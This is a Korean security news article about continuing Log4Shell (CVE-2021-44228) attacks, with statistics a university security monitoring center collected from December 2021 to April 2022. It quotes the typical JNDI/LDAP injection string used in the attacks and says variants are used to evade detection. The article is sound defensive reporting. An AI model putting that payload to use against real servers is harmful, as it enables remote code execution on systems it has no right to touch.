Home > 전체기사

로그4셸 공격 건수 분석해보니... Log4j 취약점 공격은 현재진행형!

  |  입력 : 2022-05-05 15:00
페이스북 보내기 트위터 보내기 네이버 밴드 보내기 카카오 스토리 보내기
Log4j 취약점 공격, 지난해 12월부터 지금까지 지속 포착
공격형태 다양하고, 보안장비 우회 가능성 있어 위험도 높아


[보안뉴스 기획취재팀] 지난해 발견돼 역대 최악의 취약점으로 불리는 Log4j 취약점, 일명 로그4셸을 악용한 사이버공격이 지속적으로 포착돼 이용자들의 각별한 주의가 필요하다. Log4j는 JAVA를 기반으로 서버와 응용프로그램에서 발생하는 로그를 남기기 위해 사용하는 유틸리티이다. 해당 취약점은 apache Log4j 소프트웨어의 2.14.1 이전버전에 존재하며, 식별 번호는 CVE-2021-44228이다.

▲2021년 12월~2022년 4월 로그4j 취약점 공격 건수 통계[자료=영남이공대 사이버보안연구센터]


영남이공대학교 사이버보안연구센터(센터장 이종락)에서 자체 운영중인 보안관제센터를 통해 최근까지 수집한 데이터를 살펴보면, 취약점이 발생한 지난해 12월을 기점으로 log4j 취약점 공격이 지속적으로 탐지되다가 12월 25일 공격 횟수가 250회까지 치솟았다. 이후 공격횟수는 점차 줄었으나, 올해 2월 8일 200여건으로 다시 급증했다. 또한, 3월 4일 이후 150건으로 급격히 늘었다.

공격에 주로 사용되는 코드는 ‘${jndi:ldap://server_ip:****/exploit}’이며, 공격코드가 최초 발표됐던 형태에서 보안장비 우회를 위해 다양하게 변화된 것으로 확인됐다.

log4j 취약점은 공격에 성공할 경우 피해 서버에서 공격자가 의도하는 명령어가 직접적으로 실행될 수 있어 매우 위험하다. 이는 취약점 위험도 평가인 CVSS score에서 최고점인 10점이 부여된 사실로도 알 수 있다.

영남이공대학교 사이버보안연구센터 유현서 연구원은 “공격의 형태가 매우 다양하기 때문에 탐지 룰의 구성에 따라 보안장비에서 우회 가능성이 존재한다”며 “공격 코드가 보안 장비에서 제대로 탐지되고 있는지 점검해야 한다”고 밝혔다.
[보안뉴스 기획취재팀(boan3@boannews.com)]

<저작권자: 보안뉴스(www.boannews.com) 무단전재-재배포금지>

  •  
  • 0
  • 페이스북 보내기 트위터 보내기 네이버 밴드 보내기 카카오 스토리 보내기

  •  SNS에서도 보안뉴스를 받아보세요!! 
에스케어 파워비즈 배너 2022년 3월15일 시작~ 12개월 위즈디엔에스 2018 파워비즈배너 시작 11월6일 20181105-20200131
설문조사
올해 기업에서의 클라우드 도입이 본격 확산될 것으로 보이는 가운데 이에 따른 보안 이슈도 부각되고 있습니다. 클라우드 보안 강화를 위한 방안으로 가장 주목 받을 솔루션은 무엇이라고 보시나요?
CASB(Cloud Access Security Broker, 클라우드 접근 보안중개)
CSPM(Cloud Security Posture Management, 클라우드 보안 형상 관리)
CWPP(Cloud Workload Protection Platform, 클라우드 워크로드 보호 플랫폼)
기타(댓글로)